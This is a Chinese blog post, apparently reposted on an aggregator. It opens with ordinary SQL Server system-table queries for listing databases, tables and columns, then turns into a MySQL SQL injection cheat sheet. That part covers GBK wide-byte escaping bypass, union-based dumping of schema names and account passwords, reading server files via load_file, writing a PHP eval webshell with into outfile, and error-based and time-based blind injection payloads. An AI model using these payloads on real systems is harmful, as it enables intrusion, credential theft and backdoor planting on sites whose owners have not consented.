当前位置:首页>编程日记>正文

查询Master下的系统表和系统视图获取数据库的信息和简单的渗透测试

编程日记 2023/09/17 00:09:33

在SQL中可以通过查询Master下的系统表(sys)和系统视图(information_schema)获取数据库的信息。SQL2000和SQL2005的结构略有不同。

     系统表结构参考系统表详细说明。

     系统信息结构图参考:http://dev.mysql.com/doc/refman/5.1/zh/information-schema.html

1、2000下操作:

系统表目录:大部分以dbo.sys为前缀。

系统视图目录:有20个常用的视图,以INFORMATION_SCHEMA为前缀。

在2000中我们可以用这两种方式的查询来得到相同的效果。

如:查询所有数据库:

select name from master..sysdatabases

select  catalog_name   from   INFORMATION_SCHEMA.SCHEMATA

效果一样。

查询用户创建的所有数据库

select * from master..sysdatabases D where sid not in(select sid from master..syslogins where name='sa')

或者

       select dbid, name AS DB_NAME from master..sysdatabases  where sid <> 0x01

       或者

       select name from master..sysdatabases order by name asc

 

       获取当前数据库中的所有用户表:

select Name from sysobjects where xtype='u' and status>=0

SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'

获取某一个表的所有字段

select name from syscolumns where id=object_id('表名')

SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = '表名'

查看与某一个表相关的视图、存储过程、函数

select a.* from sysobjects a, syscomments b where a.id = b.id and b.text like '%表名%'

查看当前数据库中所有存储过程

select name as 存储过程名称 from sysobjects where xtype='P'

查询某一个表的字段和数据类型

select name,xtye from syscolumns where id=object_id('表名')

SELECT COLUMN_NAME,DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = '表名'

2、2005下操作:

系统表目录:2000中的系统表,在05中都放在了系统视图目录下。

系统视图目录:存放了系统表和视图,增加了许多新的系统表,如支持xml。以sys.为前缀。

 在2005中,系统表仍然属于Master数据库下。但是视图却被分配到了各个数据库下。因此:

上面的两种查询就会有不同的结果。

第一个查询仍然可以返回所有的数据库列表。

而第二个查询只返回当前连接的数据库的信息。

除此之外的其他针对具体数据库的操作,跟2000一样。

     由于结构不同,为了保证统一性,我们在对整个服务器操作时,最好使用系统表。而在对某一个具体的数据库操作时,则既可以使用系统表也可以使用信息结构图。

以下是简单的渗透测试

magic_quotes_gpc = On           addslashes()过滤,对 ' " null 转义  即在前面加上反斜线 

PS: intval()         用于过滤数字类型

register_globals = Off          关闭注册全局变量

display_errors = Off            关闭错误提示

 

GBK宽字节突破magic_quotes_gpc = On限制 用 % f5' 代替 ' 即 ' 变成 鮘' 而不是 '

实践发现

假设 id 为数字型,如果sql语句为 id='$id' 即使用单引号,那提交?id=1 and 1=1 和?id=1 and 1=2 结果都是?id=1 ,即取空格前面的参数。

此时可使用?id=1' and 1=1# 和?id=1' and 1=2# 来判断以及构造SQL语句。

查看PHP代码有时若不替换一些字符如<,返回网页将无法查看代码。

replace(load_file(HEX),char(60),char(32))

union select 1,replace(load_file(HEX),char(60),char(32)),3

char(60)表示 <         

char(32)表示 空格

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

表示前后编码不一致

unhex(hex(参数))

union select 1,unhex(hex(load_file(HEX))),3


@@hostname                               DATA服务器名

@@version_compile_os                     判断系统类型

@@basedir                                数据库安装目录  

@@datadir                                数据库存储目录  

@@plugin_dir                             插件目录路径

@@group_concat_max_len                   group_concat()最大长度

user()                                   当前用户

database()                               当前数据库

version()                                mysql版本

concat(字段1,0x7C,字段2,0x7C,字段N)      连接多个参数

group_concat(字段)                       列出所有行

load_file(16进制文件物理地址)            读取文件

写webshell <?php @eval_r($_POST['c']);?>       PS:windows地址用 / 或者 \ ,单独 不行。

 and 1=2 union select 1,0x3C3F70687020406576616C28245F504F53545B2763275D293B3F3E,3,..n into outfile '文件物理地址'

select user,password,update_priv,file_priv from mysql.user          mysql.user为用户全局权限

select * from mysql.db                                              mysql.db为用户数据库操作权限

 and (select count(*) from 表段)>0

 and (select count(字段) from 表段)>0

 and (select length(字段) from 表段 limit N,1)>5

 and (select ascii(mid(字段,N,1)) from 表段 limit N,1)>96

 and substring(@@version,1,1)=5

   

 order by n

 and 1=2 union select 1,2,3,4,5,6,7,8,9,n#

 and 1=2 union select 1,2,TABLE_SCHEMA,4,5,6,7,8,9,n from information_schema.COLUMNS group by TABLE_SCHEMA limit N,1                         查询第N个数据库名

 and 1=2 union select 1,2,TABLE_NAME,4,5,6,7,8,9,n from information_schema.COLUMNS where TABLE_SCHEMA=16进制数据库名 limit N,1          查表段名

 and 1=2 union select 1,2,COLUMN_NAME,4,5,6,7,8,9,n from information_schema.COLUMNS where TABLE_SCHEMA=16进制数据库名 and TABLE_NAME=16进制表段名 limit N,1             查字段名

 and 1=2 union select 1,2,字段,4,5,字段,7,8,9,n from 数据库名.表段名 limit N,1         查帐号密码

偏移注射

 order by 10                      正在查询的字段有10

 and 1=2 union select *,1,2,3,4,5,6,7 from admin              表段admin有3个字段

 and 1=2 union select 1,2,3,4,5,6,7,8,9,id from admin         表段admin存在字段id

 and 1=2 union select *,1,2,3,4 from (admin as a inner join admin as b on a.id=b.id)          在5-10位置显示数据

 and 1=2 union select *,1 from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)               在2-10位置显示数据

MySQL错误回显套公式法注入

+and+1=2+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(注入爆数据语句))a+from+information_schema.tables+group+by+a)b#

+or+1=(select+1+from+(select+count(*),concat(floor(rand(0)*2),(注入爆数据语句))a+from+information_schema.tables+group+by+a)b)#

注入爆数据语句

select+concat(0x3a,database(),0x3a,user(),0x3a,version(),0x3a,@@datadir)

select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1

延时注入

select benchmark(5000000, md5('test')) from user where id=1 and 1=1

select * from user where id=1 or 1=(select benchmark(5000000, md5('test')))

select if(ascii(substring((version()),1,1))<54,benchmark(5000000, md5('test')),0) from user where id=1 and 1=1

select * from user where id=1 or if(ascii(substring((version()),1,1))<54,benchmark(5000000, md5('test')),0)


http://www.coolblog.cn/news/d75b7d99e3d5e754.html

相关文章:

  • asp多表查询并显示_SpringBoot系列(五):SpringBoot整合Mybatis实现多表关联查询
  • s7day2学习记录
  • 【求锤得锤的故事】Redis锁从面试连环炮聊到神仙打架。
  • 矿Spring入门Demo
  • 拼音怎么写_老师:不会写的字用圈代替,看到孩子试卷,网友:人才
  • Linux 实时流量监测(iptraf中文图解)
  • Win10 + Python + GPU版MXNet + VS2015 + RTools + R配置
  • 美颜
  • shell访问php文件夹,Shell获取某目录下所有文件夹的名称
  • 如何优雅的实现 Spring Boot 接口参数加密解密?
  • LeCun亲授的深度学习入门课:从飞行器的发明到卷积神经网络
  • Mac原生Terminal快速登录ssh
  • java受保护的数据与_Javascript类定义语法,私有成员、受保护成员、静态成员等介绍...
  • mysql commit 机制_1024MySQL事物提交机制
  • 支撑微博千亿调用的轻量级RPC框架:Motan
  • jquery 使用小技巧
  • 2019-9
  • 法拉利虚拟学院2010 服务器,法拉利虚拟学院2010
  • vscode pylint 错误_将实际未错误的py库添加到pylint白名单
  • 科学计算工具NumPy(3):ndarray的元素处理
  • 工程师在工作电脑存 64G 不雅文件,被公司开除后索赔 41 万,结果…
  • linux批量创建用户和密码
  • newinsets用法java_Java XYPlot.setInsets方法代碼示例
  • js常用阻止冒泡事件
  • 气泡图在开源监控工具中的应用效果
  • 各类型土地利用图例_划重点!国土空间总体规划——土地利用
  • php 启动服务器监听
  • dubbo简单示例
  • 【设计模式】 模式PK:策略模式VS状态模式
  • [iptables]Redhat 7.2下使用iptables实现NAT
  • Ubuntu13.10:[3]如何开启SSH SERVER服务
  • CSS小技巧——CSS滚动条美化
  • JS实现-页面数据无限加载
  • 阿里巴巴分布式服务框架 Dubbo
  • 最新DOS大全
  • Django View(视图系统)
  • 阿里大鱼.net core 发送短信
  • 程序员入错行怎么办?
  • 两张超级大表join优化
  • 第九天函数
  • Linux软件安装-----apache安装
  • HDU 5988 最小费用流
  • Sorenson Capital:值得投资的 5 种 AI 技术
  • 《看透springmvc源码分析与实践》读书笔记一
  • 正式开课!如何学习相机模型与标定?(单目+双目+鱼眼+深度相机)
  • Arm芯片的新革命在缓缓上演
  • nagios自写插件—check_file
  • python3 错误 Max retries exceeded with url 解决方法
  • 行为模式之Template Method模式
  • 通过Spark进行ALS离线和Stream实时推荐